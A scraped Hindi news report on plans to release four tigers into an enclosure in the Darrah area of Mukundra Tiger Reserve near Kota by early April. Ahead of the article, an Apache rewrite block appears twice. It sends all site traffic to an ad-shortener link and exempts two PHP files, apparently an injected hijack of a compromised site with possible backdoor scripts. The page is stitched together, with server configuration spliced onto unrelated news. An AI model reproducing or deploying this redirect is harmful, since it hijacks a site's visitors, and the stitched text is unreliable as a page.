
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 523
Previous Nextकोटा। मुकंदरा टाइगर रिजर्व के दरा अभ्यारण्य में शीघ्र ही टाइगर की दहाड़ गूंजेंगी। बताया जा रहा है कि दरा में चार टाइगर लाए जाएंगे। एसीएस डॉ. सुबोध अग्रवाल इसकी तैयारियों पर नजर रख रहे हैं। दरा क्षेत्र का दौरा करने के बाद वन एवं पर्यावरण विभाग, पर्यटन कला एवं संस्कृति विभाग के अतिरिक्त मुख्य सचिव डॉ. सुबोध अग्रवाल ने कहा कि मुकंदरा में एनक्लोजर की तैयारियां सही चल रही है। हर हाल में 31 मार्च तक काम पूरा हो जाएगा। इस स्थिति में अप्रैल के पहले सप्ताह में यहां दो या तीन टाइगर छोड़ दिए जाएंगे। अग्रवाल ने कलेक्टर रोहित गुप्ता, ग्रामीण एसपी राजीव पचार, सीसीएफ घनश्याम प्रसाद शर्मा, डीसीएफ डॉ. टी मोहनराज व अन्य वन अधिकारियों के साथ गुरुवार को दरा वनक्षेत्र की विजिट की। दरा वनक्षेत्र में बाघों की सॉफ्ट रिलीज के लिए बनाए गए 28 हेक्टेयर के एनक्लोजर को देखा। उन्होंने बताया कि टाइगर के लिए यह सबसे उपयुक्त जगह है। प्रे बेस एरिया कंपलीट है। पहले एक महीने तक टाइगर प्रे बेस एरिया में ही रहेगा। सभी काम 31 मार्च तक पूरे हा़े जाएंगे। यहां 800 से ज्यादा लोग जुटे हुए हैं। टाइगर दरा क्षेत्र में ही छोड़े जाएंगे। अप्रैल के पहले सप्ताह में सीएम से इसका उद्घाटन कराने की पूरी तैयारी है। यहां छोड़ने के लिए टी 91 और टी 95, टी 102 और टी 99 को चिह्नित किया है।